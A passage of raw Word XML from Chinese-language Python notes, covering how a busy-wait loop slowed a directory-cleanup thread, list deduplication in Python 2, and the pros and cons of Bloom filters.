        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22405E4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6E0F88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种写法很直观和简便，但是会对系统产生非常不必要的损耗，在该循环陷入</w:t>
      </w:r>
      <w:bookmarkStart w:id="760" w:name="OLE_LINK13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“至少短期的死循环”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="760"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，会直接影响其他线程的执行效率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56954C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如我开了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个线程，其中一个线程执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shutil.rmtree()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清理某目录，如果其他线程被我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>signal_CLEAN_FREEDISK.empty() == False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个判断锁死，则导致其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个线程陷入了“至少短期的死循环”。负责执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shutil.rmtree()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的线程虽然确实在运行，但是效率大大降低。我单独测试该函数删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>70G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录仅需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟，但是放在多线程的程序中一整天都没有清理掉一个目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA43A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F121C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>改进的写法和原理应参考：</w:t>
      </w:r>
      <w:hyperlink r:id="rId251" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/u013203733/article/details/73870701</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EA88750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样做可以减少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的抢占，使之不太影响其他的进程的使用避免卡死。比如我改进为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BC341" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E817C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        if len(global_components_deque) &gt; 0 and signal_CLEAN_FREEDISK.empty() == True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A490A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0DA0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EA0143" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种写法，多线程的效率就极大提升了。如下，清理目录线程运行相当顺利。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F2754" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6664A8F6" wp14:editId="3EB2E006">
            <wp:extent cx="5278120" cy="1289685"/>
            <wp:effectExtent l="0" t="0" r="10160" b="571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252"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5278120" cy="1289685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4A000" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650AFBB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是如下的写法就还可以，条件是一次性放入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列任务，然后运行线程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71675B8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种线程是在队列还有任务就会循环，没有任务就结束循环。且大多数时间都在执行任务而非“短期的死循环。”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FC8F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def NodeTarget():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353CEA05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    while not q.empty():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA9030" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DAA817D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="761" w:name="_Toc159780187"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表去重</w:t>
      </w:r>
      <w:bookmarkEnd w:id="761"/>
    </w:p>
    <w:p w14:paraId="21368296" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/BabyFish13/article/details/79290434</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C76BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="762" w:name="_Toc159780188"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去重，顺序乱掉</w:t>
      </w:r>
      <w:bookmarkEnd w:id="762"/>
    </w:p>
    <w:p w14:paraId="01A3AD4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3BC30D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l1 = ['b','c','d','b','c','a','a']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B6BB64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l2 = list(set(l1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FBF79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print l2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A15E1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A4AAF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783EDE07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l1 = ['b','c','d','b','c','a','a']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED8A3C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l2 = {}.fromkeys(l1).keys()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F34FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print l2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A710D93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E22B2D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="763" w:name="_Toc159780189"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去重，但是还还原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的顺序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="763"/>
    </w:p>
    <w:p w14:paraId="7432E3D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l1 = ['b','c','d','b','c','a','a']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BF98F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>l2 = list(set(l1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681DB5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l2.sort(key=l1.index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC92E4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print l2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701ACDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06518E47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l1 = ['b','c','d','b','c','a','a']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBF42B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>l2 = sorted(set(l1),key=l1.index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862B5D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print l2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6D6FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD2AF99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA74943" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="764" w:name="_Toc159780190"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布隆过滤器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="764"/>
    </w:p>
    <w:p w14:paraId="48B27086" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00938EB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布隆过滤器优缺点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6A147" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF5ED5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空间占用极小，因为本身不存储数据而是用比特位表示数据是否存在，某种程度有保密的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A02CE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入与查询时间复杂度均为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> O (k)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，常数级别，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示散列函数执行次数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E685A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>散列函数之间可以相互独立，可以在硬件指令层加速计算。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA18626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A421AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC6A00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>误差（假阳性率）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B436A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0602EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>误差（假阳性率）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB8B53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0CDCC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布隆过滤器可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断元素不在集合中，但是当元素在集合中时可能存在误判，因为当元素非常多时散列函数产生的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位点可能会重复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E67E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>维基百科有关于假阳性率的数学推导（见文末链接）这里我们直接给结论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际上是我没看懂…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，假设：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763F550" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C6B7FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位数组长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D01B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>散列函数个数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468666D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预期元素数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2374BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期望误差</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ε</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44422018" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在创建布隆过滤器时我们为了找到合适的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
